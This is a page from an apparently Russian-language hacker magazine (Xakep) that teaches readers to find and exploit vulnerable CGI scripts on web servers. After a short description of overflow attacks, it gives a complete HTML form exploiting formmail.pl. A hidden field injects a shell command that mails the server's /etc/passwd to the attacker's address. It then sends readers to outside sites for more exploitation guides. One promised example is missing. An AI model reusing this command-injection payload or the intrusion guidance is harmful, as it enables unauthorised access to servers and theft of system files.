В ПОИСКАХ ВАКАНТНЫХ ДЫР...

Спецвыпуск Xakep, номер #022, стр. 022-028-5


Overflow. Скрипту передается заведомо большой запрос, что приводит к некорректной его обработке, и, как следствие, скрипт может не выполнить проверку на, скажем, передачу управления либо совершить непредусмотренные разработчиком действия. К скриптам такого рода относится, например, args.bat, прилагающийся к Website 1.x. Overflow - атака позволила в свое время взломать сервер ID Software.

Мэлеры. Путем передачи управления, скажем, тому же sendmail'y, реально получить по почте любой файл, на доступ к которому есть права у httpd. Скажем, если на www.host.com находится formmail, то, создав страницу со следующими полями:

<FORM Method="POST" Action="http://www.host.com/cgi-bin/formmail.pl">

<INPUT TYPE="hidden" NAME="recipient"VALUE="some@email.com; /bin/mail your@email.com < /etc/passwd">,

можно получить passwd к себе в мыльницу.

После того как ты нашел на серваке дырявый скрипт и уверен, что он там действительно лежит, беги скорее на www.void.ru и ищи там статью "CGI-ЖУКС: подробно и по-русски" - тут описания большинства дырявых скриптов и инструкция по использованию дырок в них ;). Или беги сюда: http://qwerty.nanko.ru - тут намного больший архив, но уже на ангельском ;(.

Ну, на этом, я думаю, мы закончим.

Если ты все понял, то у тебя скоро получится что-то типа этого:

Если появятся какие-то вопросы, сначала поищи ответы в Инете, а потом уже начинай бомбить мой несчастный мыл ;).

Назад на стр. 022-028-4  Содержание